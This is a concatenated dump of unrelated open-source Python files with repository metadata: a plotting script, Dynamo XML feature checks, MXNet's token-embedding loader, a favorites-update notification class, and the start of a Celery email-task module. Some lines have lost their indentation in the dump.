            svDist = distances[j]
            if gradients[j] == 0:
                gradients[j] = svGrad
            svGrad = gradients[j]
        axis.set_title(subject)
        axis.plot(times, distances, lw=1.5)
        axis.set_xlim([0, 10])
        axis.xaxis.grid(False)
    # Maximize the window ('zoomed' is specific to the Tk backend on Windows).
    mng = plt.get_current_fig_manager()
    mng.window.state('zoomed')
    #fig.text(0.1, 0.5, 'Gradient of the Face Distance (in Centimeters)',
    fig.text(0.1, 0.5, 'Face Distance (in Centimeters)',
             va='center', rotation='vertical', fontsize=15)
    fig.text(0.5, 0.055, 'Video Progress (in Minutes)', ha='center', fontsize=15)
    plt.show()
#---------------------------------------------
def plotData(axis, frames, distances, gradients):
    """
    Plot the gradient series of a subject on the given axis.

    Parameters
    ----------
    axis: matplotlib.axis
        Axis of the figure or subfigure where to plot the data.
    frames: list
        List of frame numbers of the subject.
    distances: list
        List of facial distances of the subject (not plotted here).
    gradients: list
        List of distance gradients of the subject.
    """
    # Convert frame numbers to minutes for the x axis (video is 30 fps).
    fps = 30
    minutes = [frame / 60 / fps for frame in frames]
    # Index of the first sample to plot (0 = the whole session).
    first = 0

    axis.set_xlim([0, 10])
    axis.set_ylim([-10, 10])
    axis.plot(minutes[first:], gradients[first:], 'b', lw=1.5)
#---------------------------------------------
# Script entry point: call main() only when this file is executed
# directly (not imported), forwarding the command-line arguments with
# the program name stripped.
#---------------------------------------------
if __name__ == '__main__':
main(sys.argv[1:]) | luigivieira/fsdk | fsdk/reports/distances.py | Python | mit | 6,011 |
# Feature extractors for XML files ( 0 < Dynamo < 2)
import xml.etree.ElementTree as ET
def getVersion(b64decodedData):
    """Return the 'Version' attribute of the workspace XML root element."""
    root = ET.fromstring(b64decodedData)
    return root.attrib["Version"]
def usesListAtLevel(data):
    """Report whether any node in the XML text uses list-at-level (useLevels)."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'useLevels="True"' in data
def hasHiddenNodes(data):
    """Report whether any node in the XML text is marked not visible."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'isVisible="false"' in data
def hasUpstreamHiddenNodes(data):
    """Report whether any node hides its upstream geometry preview."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'isUpstreamVisible="false"' in data
def hasShortestLacing(data):
    """Report whether any node uses 'Shortest' lacing."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'lacing="Shortest"' in data
def hasLongestLacing(data):
    """Report whether any node uses 'Longest' lacing."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'lacing="Longest"' in data
def hasDisabledLacing(data):
    """Report whether any node has lacing disabled."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'lacing="Disabled"' in data
def hasCrossProductLacing(data):
    """Report whether any node uses 'CrossProduct' lacing."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'lacing="CrossProduct"' in data
def hasPinned(data):
    """Report whether any node in the XML text is pinned."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'isPinned="true"' in data
def hasFrozen(data):
    """Report whether any node in the XML text is frozen."""
    # Substring membership is the idiomatic form of data.find(...) > -1.
    return 'IsFrozen="true"' in data # sic IsFrozen
| DynamoDS/Coulomb | SessionTools/features_XML.py | Python | mit | 941 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=consider-iterating-dictionary
# pylint: disable=super-init-not-called
"""Text token embeddings."""
from __future__ import absolute_import
from __future__ import print_function
import io
import logging
import os
import tarfile
import warnings
import zipfile
from . import _constants as C
from . import vocab
from ... import ndarray as nd
from ... import registry
from ... import base
def register(embedding_cls):
    """Registers a new token embedding.

    Once an embedding is registered, we can create an instance of it with
    :func:`~mxnet.contrib.text.embedding.create`.

    Examples
    --------
    >>> @mxnet.contrib.text.embedding.register
    ... class MyTextEmbed(mxnet.contrib.text.embedding._TokenEmbedding):
    ...     def __init__(self, pretrained_file_name='my_pretrain_file'):
    ...         pass
    >>> embed = mxnet.contrib.text.embedding.create('MyTokenEmbed')
    >>> print(type(embed))
    <class '__main__.MyTextEmbed'>
    """
    register_func = registry.get_register_func(_TokenEmbedding, 'token embedding')
    return register_func(embedding_cls)
def create(embedding_name, **kwargs):
    """Create a token embedding instance by name.

    The instance loads embedding vectors from an externally hosted
    pre-trained token embedding file, such as those of GloVe and FastText.
    All the valid `embedding_name` and `pretrained_file_name` values can be
    listed with `mxnet.contrib.text.embedding.get_pretrained_file_names()`.

    Parameters
    ----------
    embedding_name : str
        The token embedding name (case-insensitive).

    Returns
    -------
    An instance of `mxnet.contrib.text.glossary._TokenEmbedding`:
        A token embedding instance loaded from an externally hosted
        pre-trained token embedding file.
    """
    factory = registry.get_create_func(_TokenEmbedding, 'token embedding')
    return factory(embedding_name, **kwargs)
def get_pretrained_file_names(embedding_name=None):
    """Get valid token embedding names and their pre-trained file names.

    To load vectors from an externally hosted pre-trained token embedding
    file, such as those of GloVe and FastText, one should use
    `mxnet.contrib.text.embedding.create(embedding_name, pretrained_file_name)`.
    This method lists the valid `pretrained_file_name` values for the given
    `embedding_name`; when `embedding_name` is None it maps every valid
    embedding name to its list of pre-trained file names.

    Parameters
    ----------
    embedding_name : str or None, default None
        The pre-trained token embedding name.

    Returns
    -------
    dict or list:
        A list of valid pre-trained file names for the requested embedding
        name, or -- when `embedding_name` is None -- a dict mapping each
        valid embedding name to its list of pre-trained file names.
    """
    reg = registry.get_registry(_TokenEmbedding)
    if embedding_name is None:
        return {name: list(cls.pretrained_file_name_sha1.keys())
                for name, cls in reg.items()}
    if embedding_name not in reg:
        raise KeyError('Cannot find `embedding_name` %s. Use '
                       '`get_pretrained_file_names('
                       'embedding_name=None).keys()` to get all the valid embedding '
                       'names.' % embedding_name)
    return list(reg[embedding_name].pretrained_file_name_sha1.keys())
class _TokenEmbedding(vocab.Vocabulary):
"""Token embedding base class.
To load token embeddings from an externally hosted pre-trained token embedding file, such as
those of GloVe and FastText, use
:func:`~mxnet.contrib.text.embedding.create(embedding_name, pretrained_file_name)`.
To get all the available `embedding_name` and `pretrained_file_name`, use
:func:`~mxnet.contrib.text.embedding.get_pretrained_file_names()`.
Alternatively, to load embedding vectors from a custom pre-trained token embedding file, use
:class:`~mxnet.contrib.text.embedding.CustomEmbedding`.
Moreover, to load composite embedding vectors, such as to concatenate embedding vectors, use
:class:`~mxnet.contrib.text.embedding.CompositeEmbedding`.
For every unknown token, if its representation `self.unknown_token` is encountered in the
pre-trained token embedding file, index 0 of `self.idx_to_vec` maps to the pre-trained token
embedding vector loaded from the file; otherwise, index 0 of `self.idx_to_vec` maps to the
token embedding vector initialized by `init_unknown_vec`.
If a token is encountered multiple times in the pre-trained token embedding file, only the
first-encountered token embedding vector will be loaded and the rest will be skipped.
The indexed tokens in a text token embedding may come from a vocabulary or from the loaded
embedding vectors. In the former case, only the indexed tokens in a vocabulary are associated
with the loaded embedding vectors, such as loaded from a pre-trained token embedding file. In
the later case, all the tokens from the loaded embedding vectors, such as loaded from a
pre-trained token embedding file, are taken as the indexed tokens of the embedding.
Attributes
----------
token_to_idx : dict mapping str to int
A dict mapping each token to its index integer.
idx_to_token : list of strs
A list of indexed tokens where the list indices and the token indices are aligned.
unknown_token : hashable object
The representation for any unknown token. In other words, any unknown token will be indexed
as the same representation.
reserved_tokens : list of strs or None
A list of reserved tokens that will always be indexed.
vec_len : int
The length of the embedding vector for each token.
idx_to_vec : mxnet.ndarray.NDArray
For all the indexed tokens in this embedding, this NDArray maps each token's index to an
embedding vector. The largest valid index maps to the initialized embedding vector for every
reserved token, such as an unknown_token token and a padding token.
"""
    def __init__(self, **kwargs):
        # Delegate token indexing (unknown/reserved token handling, etc.)
        # entirely to the Vocabulary base class.
        super(_TokenEmbedding, self).__init__(**kwargs)
    @classmethod
    def _get_download_file_name(cls, pretrained_file_name):
        # By default the downloaded file is the pre-trained file itself;
        # subclasses override this when the download is an archive.
        return pretrained_file_name
@classmethod
def _get_pretrained_file_url(cls, pretrained_file_name):
repo_url = os.environ.get('MXNET_GLUON_REPO', C.APACHE_REPO_URL)
embedding_cls = cls.__name__.lower()
url_format = '{repo_url}gluon/embeddings/{cls}/{file_name}'
return url_format.format(repo_url=repo_url, cls=embedding_cls,
file_name=cls._get_download_file_name(pretrained_file_name))
    @classmethod
    def _get_pretrained_file(cls, embedding_root, pretrained_file_name):
        """Download (if needed) and return the local path of a pre-trained file.

        The download is skipped when a file with the expected SHA-1 already
        exists under `embedding_root/<embedding class name>/`. Zip and
        tar.gz downloads are extracted in place.
        """
        from ...gluon.utils import check_sha1, download
        embedding_cls = cls.__name__.lower()
        embedding_root = os.path.expanduser(embedding_root)
        url = cls._get_pretrained_file_url(pretrained_file_name)
        embedding_dir = os.path.join(embedding_root, embedding_cls)
        pretrained_file_path = os.path.join(embedding_dir, pretrained_file_name)
        downloaded_file = os.path.basename(url)
        downloaded_file_path = os.path.join(embedding_dir, downloaded_file)
        expected_file_hash = cls.pretrained_file_name_sha1[pretrained_file_name]
        if hasattr(cls, 'pretrained_archive_name_sha1'):
            # The downloaded archive has its own hash, distinct from the
            # hash of the embedding file extracted out of it.
            expected_downloaded_hash = \
                cls.pretrained_archive_name_sha1[downloaded_file]
        else:
            expected_downloaded_hash = expected_file_hash
        if not os.path.exists(pretrained_file_path) \
                or not check_sha1(pretrained_file_path, expected_file_hash):
            download(url, downloaded_file_path, sha1_hash=expected_downloaded_hash)
            ext = os.path.splitext(downloaded_file)[1]
            if ext == '.zip':
                with zipfile.ZipFile(downloaded_file_path, 'r') as zf:
                    zf.extractall(embedding_dir)
            elif ext == '.gz':
                # NOTE(review): tarfile.extractall trusts archive member
                # paths; acceptable only because the archive comes from the
                # project's own repository.
                with tarfile.open(downloaded_file_path, 'r:gz') as tar:
                    tar.extractall(path=embedding_dir)
        return pretrained_file_path
    def _load_embedding(self, pretrained_file_path, elem_delim, init_unknown_vec, encoding='utf8'):
        """Load embedding vectors from the pre-trained token embedding file.

        For every unknown token, if its representation `self.unknown_token` is encountered in the
        pre-trained token embedding file, index 0 of `self.idx_to_vec` maps to the pre-trained token
        embedding vector loaded from the file; otherwise, index 0 of `self.idx_to_vec` maps to the
        token embedding vector initialized by `init_unknown_vec`.

        If a token is encountered multiple times in the pre-trained token embedding file, only the
        first-encountered token embedding vector will be loaded and the rest will be skipped.

        Side effects: populates `self._idx_to_token`, `self._token_to_idx`,
        `self._vec_len` and `self._idx_to_vec`.
        """
        pretrained_file_path = os.path.expanduser(pretrained_file_path)

        if not os.path.isfile(pretrained_file_path):
            raise ValueError('`pretrained_file_path` must be a valid path to '
                             'the pre-trained token embedding file.')

        logging.info('Loading pre-trained token embedding vectors from %s', pretrained_file_path)
        vec_len = None
        all_elems = []
        tokens = set()
        loaded_unknown_vec = None
        line_num = 0
        with io.open(pretrained_file_path, 'r', encoding=encoding) as f:
            for line in f:
                line_num += 1
                elems = line.rstrip().split(elem_delim)

                assert len(elems) > 1, 'At line %d of the pre-trained text embedding file: the ' \
                                       'data format of the pre-trained token embedding file %s ' \
                                       'is unexpected.' % (line_num, pretrained_file_path)

                token, elems = elems[0], [float(i) for i in elems[1:]]

                if token == self.unknown_token and loaded_unknown_vec is None:
                    loaded_unknown_vec = elems
                    tokens.add(self.unknown_token)
                elif token in tokens:
                    warnings.warn('At line %d of the pre-trained token embedding file: the '
                                  'embedding vector for token %s has been loaded and a duplicate '
                                  'embedding for the same token is seen and skipped.' %
                                  (line_num, token))
                elif len(elems) == 1:
                    # A single number on a line is almost certainly the
                    # "<vocab size> <dim>" header some formats emit.
                    warnings.warn('At line %d of the pre-trained text embedding file: token %s '
                                  'with 1-dimensional vector %s is likely a header and is '
                                  'skipped.' % (line_num, token, elems))
                else:
                    if vec_len is None:
                        vec_len = len(elems)
                        # Reserve a vector slot for the unknown token at the very beginning because
                        # the unknown index is 0.
                        all_elems.extend([0] * vec_len)
                    else:
                        assert len(elems) == vec_len, \
                            'At line %d of the pre-trained token embedding file: the dimension ' \
                            'of token %s is %d but the dimension of previous tokens is %d. ' \
                            'Dimensions of all the tokens must be the same.' \
                            % (line_num, token, len(elems), vec_len)
                    all_elems.extend(elems)
                    self._idx_to_token.append(token)
                    self._token_to_idx[token] = len(self._idx_to_token) - 1
                    tokens.add(token)

        self._vec_len = vec_len
        self._idx_to_vec = nd.array(all_elems).reshape((-1, self.vec_len))

        if loaded_unknown_vec is None:
            # No embedding for the unknown token was found in the file:
            # fall back to the caller-provided initializer.
            self._idx_to_vec[C.UNKNOWN_IDX] = init_unknown_vec(shape=self.vec_len)
        else:
            self._idx_to_vec[C.UNKNOWN_IDX] = nd.array(loaded_unknown_vec)
def _index_tokens_from_vocabulary(self, vocabulary):
self._token_to_idx = vocabulary.token_to_idx.copy() \
if vocabulary.token_to_idx is not None else None
self._idx_to_token = vocabulary.idx_to_token[:] \
if vocabulary.idx_to_token is not None else None
self._unknown_token = vocabulary.unknown_token
self._reserved_tokens = vocabulary.reserved_tokens[:] \
if vocabulary.reserved_tokens is not None else None
    def _set_idx_to_vec_by_embeddings(self, token_embeddings, vocab_len, vocab_idx_to_token):
        """Sets the mapping between token indices and token embedding vectors.

        Parameters
        ----------
        token_embeddings : instance or list `mxnet.contrib.text.embedding._TokenEmbedding`
            One or multiple pre-trained token embeddings to load. If it is a list of multiple
            embeddings, these embedding vectors will be concatenated for each token.
        vocab_len : int
            Length of vocabulary whose tokens are indexed in the token embedding.
        vocab_idx_to_token: list of str
            A list of indexed tokens in the vocabulary. These tokens are indexed in the token
            embedding.
        """
        new_vec_len = sum(embed.vec_len for embed in token_embeddings)
        new_idx_to_vec = nd.zeros(shape=(vocab_len, new_vec_len))

        col_start = 0
        # Concatenate all the embedding vectors in token_embeddings,
        # each embedding occupying its own column range.
        for embed in token_embeddings:
            col_end = col_start + embed.vec_len
            # Concatenate vectors of the unknown token (row 0 is reserved
            # for it -- C.UNKNOWN_IDX).
            new_idx_to_vec[0, col_start:col_end] = embed.idx_to_vec[0]
            new_idx_to_vec[1:, col_start:col_end] = embed.get_vecs_by_tokens(vocab_idx_to_token[1:])
            col_start = col_end

        self._vec_len = new_vec_len
        self._idx_to_vec = new_idx_to_vec
    def _build_embedding_for_vocabulary(self, vocabulary):
        # Align this embedding with the given vocabulary: rows of
        # idx_to_vec follow the vocabulary's token indices, and the
        # vocabulary's token indexing is adopted. A None vocabulary is a
        # no-op.
        if vocabulary is not None:
            assert isinstance(vocabulary, vocab.Vocabulary), \
                'The argument `vocabulary` must be an instance of ' \
                'mxnet.contrib.text.vocab.Vocabulary.'

            # Set _idx_to_vec so that indices of tokens from vocabulary are associated with the
            # loaded token embedding vectors.
            self._set_idx_to_vec_by_embeddings([self], len(vocabulary), vocabulary.idx_to_token)

            # Index tokens from vocabulary.
            self._index_tokens_from_vocabulary(vocabulary)
    @property
    def vec_len(self):
        """int: length of the embedding vector for each indexed token."""
        return self._vec_len
    @property
    def idx_to_vec(self):
        """NDArray: maps each token index to its embedding vector (row-wise)."""
        return self._idx_to_vec
    def get_vecs_by_tokens(self, tokens, lower_case_backup=False):
        """Look up embedding vectors of tokens.

        Parameters
        ----------
        tokens : str or list of strs
            A token or a list of tokens.
        lower_case_backup : bool, default False
            If False, each token in the original case will be looked up; if True, each token in the
            original case will be looked up first, if not found in the keys of the property
            `token_to_idx`, the token in the lower case will be looked up.

        Returns
        -------
        mxnet.ndarray.NDArray:
            The embedding vector(s) of the token(s). According to numpy conventions, if `tokens` is
            a string, returns a 1-D NDArray of shape `self.vec_len`; if `tokens` is a list of
            strings, returns a 2-D NDArray of shape=(len(tokens), self.vec_len).
        """
        # Remember whether a single token was passed so the result can be
        # squeezed back to 1-D at the end.
        to_reduce = False
        if not isinstance(tokens, list):
            tokens = [tokens]
            to_reduce = True

        # Unknown tokens map to C.UNKNOWN_IDX (row 0 of idx_to_vec).
        if not lower_case_backup:
            indices = [self.token_to_idx.get(token, C.UNKNOWN_IDX) for token in tokens]
        else:
            indices = [self.token_to_idx[token] if token in self.token_to_idx
                       else self.token_to_idx.get(token.lower(), C.UNKNOWN_IDX)
                       for token in tokens]

        vecs = nd.Embedding(nd.array(indices), self.idx_to_vec, self.idx_to_vec.shape[0],
                            self.idx_to_vec.shape[1])

        return vecs[0] if to_reduce else vecs
def update_token_vectors(self, tokens, new_vectors):
"""Updates embedding vectors for tokens.
Parameters
----------
tokens : str or a list of strs
A token or a list of tokens whose embedding vector are to be updated.
new_vectors : mxnet.ndarray.NDArray
An NDArray to be assigned to the embedding vectors of `tokens`. Its length must be equal
to the number of `tokens` and its width must be equal to the dimension of embeddings of
the glossary. If `tokens` is a singleton, it must be 1-D or 2-D. If `tokens` is a list
of multiple strings, it must be 2-D.
"""
assert self.idx_to_vec is not None, 'The property `idx_to_vec` has not been properly set.'
if not isinstance(tokens, list) or len(tokens) == 1:
assert isinstance(new_vectors, nd.NDArray) and len(new_vectors.shape) in [1, 2], \
'`new_vectors` must be a 1-D or 2-D NDArray if `tokens` is a singleton.'
if not isinstance(tokens, list):
tokens = [tokens]
if len(new_vectors.shape) == 1:
new_vectors = new_vectors.expand_dims(0)
else:
assert isinstance(new_vectors, nd.NDArray) and len(new_vectors.shape) == 2, \
'`new_vectors` must be a 2-D NDArray if `tokens` is a list of multiple strings.'
assert new_vectors.shape == (len(tokens), self.vec_len), \
'The length of new_vectors must be equal to the number of tokens and the width of' \
'new_vectors must be equal to the dimension of embeddings of the glossary.'
indices = []
for token in tokens:
if token in self.token_to_idx:
indices.append(self.token_to_idx[token])
else:
raise ValueError('Token %s is unknown. To update the embedding vector for an '
'unknown token, please specify it explicitly as the '
'`unknown_token` %s in `tokens`. This is to avoid unintended '
'updates.' % (token, self.idx_to_token[C.UNKNOWN_IDX]))
self._idx_to_vec[nd.array(indices)] = new_vectors
@classmethod
def _check_pretrained_file_names(cls, pretrained_file_name):
"""Checks if a pre-trained token embedding file name is valid.
Parameters
----------
pretrained_file_name : str
The pre-trained token embedding file.
"""
embedding_name = cls.__name__.lower()
if pretrained_file_name not in cls.pretrained_file_name_sha1:
raise KeyError('Cannot find pretrained file %s for token embedding %s. Valid '
'pretrained files for embedding %s: %s' %
(pretrained_file_name, embedding_name, embedding_name,
', '.join(cls.pretrained_file_name_sha1.keys())))
@register
class GloVe(_TokenEmbedding):
    """The GloVe word embedding.
    GloVe is an unsupervised learning algorithm for obtaining vector representations for words.
    Training is performed on aggregated global word-word co-occurrence statistics from a corpus, and
    the resulting representations showcase interesting linear substructures of the word vector
    space. (Source from https://nlp.stanford.edu/projects/glove/)
    References
    ----------
    GloVe: Global Vectors for Word Representation.
    Jeffrey Pennington, Richard Socher, and Christopher D. Manning.
    https://nlp.stanford.edu/pubs/glove.pdf
    Website:
    https://nlp.stanford.edu/projects/glove/
    To get the updated URLs to the externally hosted pre-trained token embedding
    files, visit https://nlp.stanford.edu/projects/glove/
    License for pre-trained embeddings:
    https://fedoraproject.org/wiki/Licensing/PDDL
    Parameters
    ----------
    pretrained_file_name : str, default 'glove.840B.300d.txt'
        The name of the pre-trained token embedding file.
    embedding_root : str, default $MXNET_HOME/embeddings
        The root directory for storing embedding-related files.
    init_unknown_vec : callback
        The callback used to initialize the embedding vector for the unknown token.
    vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`, default None
        It contains the tokens to index. Each indexed token will be associated with the loaded
        embedding vectors, such as loaded from a pre-trained token embedding file. If None, all the
        tokens from the loaded embedding vectors, such as loaded from a pre-trained token embedding
        file, will be indexed.
    """
    # Map a pre-trained token embedding archive file and its SHA-1 hash.
    # NOTE(review): the constant names look swapped relative to these comments
    # (FILE_SHA1 feeds the archive map, ARCHIVE_SHA1 the file map) -- verify
    # against mxnet.contrib.text.constants.
    pretrained_archive_name_sha1 = C.GLOVE_PRETRAINED_FILE_SHA1
    # Map a pre-trained token embedding file and its SHA-1 hash.
    pretrained_file_name_sha1 = C.GLOVE_PRETRAINED_ARCHIVE_SHA1
    @classmethod
    def _get_download_file_name(cls, pretrained_file_name):
        # Map a pre-trained embedding file to its archive to download.
        # Keyed by the second dotted component, e.g. '840B' in
        # 'glove.840B.300d.txt'.
        src_archive = {archive.split('.')[1]: archive for archive in
                       GloVe.pretrained_archive_name_sha1.keys()}
        archive = src_archive[pretrained_file_name.split('.')[1]]
        return archive
    def __init__(self, pretrained_file_name='glove.840B.300d.txt',
                 embedding_root=os.path.join(base.data_dir(), 'embeddings'),
                 init_unknown_vec=nd.zeros, vocabulary=None, **kwargs):
        GloVe._check_pretrained_file_names(pretrained_file_name)
        super(GloVe, self).__init__(**kwargs)
        # Fetch (downloading if necessary) and parse the space-delimited
        # pre-trained vectors.
        pretrained_file_path = GloVe._get_pretrained_file(embedding_root, pretrained_file_name)
        self._load_embedding(pretrained_file_path, ' ', init_unknown_vec)
        if vocabulary is not None:
            self._build_embedding_for_vocabulary(vocabulary)
@register
class FastText(_TokenEmbedding):
    """The fastText word embedding.
    FastText is an open-source, free, lightweight library that allows users to learn text
    representations and text classifiers. It works on standard, generic hardware. Models can later
    be reduced in size to even fit on mobile devices. (Source from https://fasttext.cc/)
    References
    ----------
    Enriching Word Vectors with Subword Information.
    Piotr Bojanowski, Edouard Grave, Armand Joulin, and Tomas Mikolov.
    https://arxiv.org/abs/1607.04606
    Bag of Tricks for Efficient Text Classification.
    Armand Joulin, Edouard Grave, Piotr Bojanowski, and Tomas Mikolov.
    https://arxiv.org/abs/1607.01759
    FastText.zip: Compressing text classification models.
    Armand Joulin, Edouard Grave, Piotr Bojanowski, Matthijs Douze, Herve Jegou,
    and Tomas Mikolov.
    https://arxiv.org/abs/1612.03651
    For 'wiki.multi' embeddings:
    Word Translation Without Parallel Data
    Alexis Conneau, Guillaume Lample, Marc'Aurelio Ranzato, Ludovic Denoyer,
    and Herve Jegou.
    https://arxiv.org/abs/1710.04087
    Website:
    https://fasttext.cc/
    To get the updated URLs to the externally hosted pre-trained token embedding files, visit
    https://github.com/facebookresearch/fastText/blob/master/pretrained-vectors.md
    License for pre-trained embeddings:
    https://creativecommons.org/licenses/by-sa/3.0/
    Parameters
    ----------
    pretrained_file_name : str, default 'wiki.simple.vec'
        The name of the pre-trained token embedding file.
    embedding_root : str, default $MXNET_HOME/embeddings
        The root directory for storing embedding-related files.
    init_unknown_vec : callback
        The callback used to initialize the embedding vector for the unknown token.
    vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`, default None
        It contains the tokens to index. Each indexed token will be associated with the loaded
        embedding vectors, such as loaded from a pre-trained token embedding file. If None, all the
        tokens from the loaded embedding vectors, such as loaded from a pre-trained token embedding
        file, will be indexed.
    """
    # Map a pre-trained token embedding archive file and its SHA-1 hash.
    pretrained_archive_name_sha1 = C.FAST_TEXT_ARCHIVE_SHA1
    # Map a pre-trained token embedding file and its SHA-1 hash.
    pretrained_file_name_sha1 = C.FAST_TEXT_FILE_SHA1
    @classmethod
    def _get_download_file_name(cls, pretrained_file_name):
        # Map a pre-trained embedding file to its archive to download.
        # E.g. 'wiki.simple.vec' -> 'wiki.simple.zip'.
        return '.'.join(pretrained_file_name.split('.')[:-1])+'.zip'
    def __init__(self, pretrained_file_name='wiki.simple.vec',
                 embedding_root=os.path.join(base.data_dir(), 'embeddings'),
                 init_unknown_vec=nd.zeros, vocabulary=None, **kwargs):
        FastText._check_pretrained_file_names(pretrained_file_name)
        super(FastText, self).__init__(**kwargs)
        # Fetch (downloading if necessary) and parse the space-delimited
        # pre-trained vectors.
        pretrained_file_path = FastText._get_pretrained_file(embedding_root, pretrained_file_name)
        self._load_embedding(pretrained_file_path, ' ', init_unknown_vec)
        if vocabulary is not None:
            self._build_embedding_for_vocabulary(vocabulary)
class CustomEmbedding(_TokenEmbedding):
    """User-defined token embedding.
    This is to load embedding vectors from a user-defined pre-trained text embedding file.
    Denote by '[ed]' the argument `elem_delim`. Denote by [v_ij] the j-th element of the token
    embedding vector for [token_i], the expected format of a custom pre-trained token embedding file
    is:
    '[token_1][ed][v_11][ed][v_12][ed]...[ed][v_1k]\\\\n[token_2][ed][v_21][ed][v_22][ed]...[ed]
    [v_2k]\\\\n...'
    where k is the length of the embedding vector `vec_len`.
    Parameters
    ----------
    pretrained_file_path : str
        The path to the custom pre-trained token embedding file.
    elem_delim : str, default ' '
        The delimiter for splitting a token and every embedding vector element value on the same
        line of the custom pre-trained token embedding file.
    encoding : str, default 'utf8'
        The encoding scheme for reading the custom pre-trained token embedding file.
    init_unknown_vec : callback
        The callback used to initialize the embedding vector for the unknown token.
    vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`, default None
        It contains the tokens to index. Each indexed token will be associated with the loaded
        embedding vectors, such as loaded from a pre-trained token embedding file. If None, all the
        tokens from the loaded embedding vectors, such as loaded from a pre-trained token embedding
        file, will be indexed.
    """
    def __init__(self, pretrained_file_path, elem_delim=' ', encoding='utf8',
                 init_unknown_vec=nd.zeros, vocabulary=None, **kwargs):
        super(CustomEmbedding, self).__init__(**kwargs)
        # Parse the user-supplied local file directly; nothing is downloaded.
        self._load_embedding(pretrained_file_path, elem_delim, init_unknown_vec, encoding)
        if vocabulary is not None:
            self._build_embedding_for_vocabulary(vocabulary)
class CompositeEmbedding(_TokenEmbedding):
    """Composite token embeddings.
    For each indexed token in a vocabulary, multiple embedding vectors, such as concatenated
    multiple embedding vectors, will be associated with it. Such embedding vectors can be loaded
    from externally hosted or custom pre-trained token embedding files, such as via token embedding
    instances.
    Parameters
    ----------
    vocabulary : :class:`~mxnet.contrib.text.vocab.Vocabulary`
        For each indexed token in a vocabulary, multiple embedding vectors, such as concatenated
        multiple embedding vectors, will be associated with it.
    token_embeddings : instance or list of `mxnet.contrib.text.embedding._TokenEmbedding`
        One or multiple pre-trained token embeddings to load. If it is a list of multiple
        embeddings, these embedding vectors will be concatenated for each token.
    """
    def __init__(self, vocabulary, token_embeddings):
        # Sanity checks. (Messages fixed: the vocabulary check referred to the
        # non-existent `indexer.Vocabulary` path, the embedding check to a
        # `TextEmbedding` class, and two concatenated string parts were
        # missing a separating space.)
        assert isinstance(vocabulary, vocab.Vocabulary), \
            'The argument `vocabulary` must be an instance of ' \
            'mxnet.contrib.text.vocab.Vocabulary.'
        if not isinstance(token_embeddings, list):
            token_embeddings = [token_embeddings]
        for embed in token_embeddings:
            assert isinstance(embed, _TokenEmbedding), \
                'The argument `token_embeddings` must be an instance or a list of instances ' \
                'of `mxnet.contrib.text.embedding._TokenEmbedding` whose embedding vectors ' \
                'will be loaded or concatenated-then-loaded to map to the indexed tokens.'
        # Index tokens.
        self._index_tokens_from_vocabulary(vocabulary)
        # Set _idx_to_vec so that indices of tokens from keys of `counter` are associated with token
        # embedding vectors from `token_embeddings`.
        self._set_idx_to_vec_by_embeddings(token_embeddings, len(self), self.idx_to_token)
| tlby/mxnet | python/mxnet/contrib/text/embedding.py | Python | apache-2.0 | 30,929 |
from consts.client_type import ClientType
from consts.notification_type import NotificationType
from controllers.gcm.gcm import GCMMessage
from notifications.base_notification import BaseNotification
class UpdateFavoritesNotification(BaseNotification):
    """Notify a user's other devices that their favorites list changed."""

    _supported_clients = [ClientType.OS_ANDROID, ClientType.WEBHOOK]
    _track_call = False

    def __init__(self, user_id, sending_device_key):
        self.user_id = user_id
        # Device that triggered the change; it is excluded from delivery.
        self.sending_device_key = sending_device_key

    @property
    def _type(self):
        return NotificationType.UPDATE_FAVORITES

    def _build_dict(self):
        return {'message_type': NotificationType.type_names[self._type]}

    def _render_android(self):
        # Per-user collapse key so GCM coalesces repeated updates.
        collapse_key = "{}_favorite_update".format(self.user_id)
        android_keys = self.keys[ClientType.OS_ANDROID]
        # Do not echo the notification back to the device that sent it.
        if self.sending_device_key in android_keys:
            android_keys.remove(self.sending_device_key)
        return GCMMessage(android_keys, self._build_dict(), collapse_key=collapse_key)
| nwalters512/the-blue-alliance | notifications/update_favorites.py | Python | mit | 1,094 |
from datetime import datetime
from dateutil.relativedelta import relativedelta
from flask import Flask
from celery import Celery
from .mail_utility import send_email
def make_celery(app):
    """Create a Celery app that shares the Flask app's config and runs every
    task inside the Flask application context."""
    celery_app = Celery(app.import_name,
                        backend=app.config['CELERY_BACKEND'],
                        broker=app.config['CELERY_BROKER_URL'])
    celery_app.conf.update(app.config)
    base_task = celery_app.Task

    class ContextTask(base_task):
        # Wrap task execution in app.app_context() so extensions that need
        # the Flask context (db, mail, ...) work inside tasks.
        abstract = True

        def __call__(self, *args, **kwargs):
            with app.app_context():
                return base_task.__call__(self, *args, **kwargs)

    celery_app.Task = ContextTask
    return celery_app
# Flask app configured from the project-level ``config`` module; the Celery
# instance below shares that configuration and runs tasks in the app context.
flask_app = Flask(__name__)
flask_app.config.from_object('config')
celery = make_celery(flask_app)
# When DEBUG is truthy, scheduling failures below are re-raised instead of
# being silently ignored.
DEBUG = flask_app.config.get('DEBUG')
@celery.task()
def send_email_task(email_recipients, message, subject):
    """One-off Celery task: deliver `message` with `subject` to `email_recipients`."""
    send_email(email_recipients, message, subject)
@celery.task()
def send_email_periodic_task(email_recipients, message, subject, period_data, last_date):
    """Deliver an email, then schedule the next delivery of the series.

    `last_date` arrives as a '%Y-%m-%dT%H:%M:%S' string; the datetime passed
    to apply_async below is presumably serialized back to that form by the
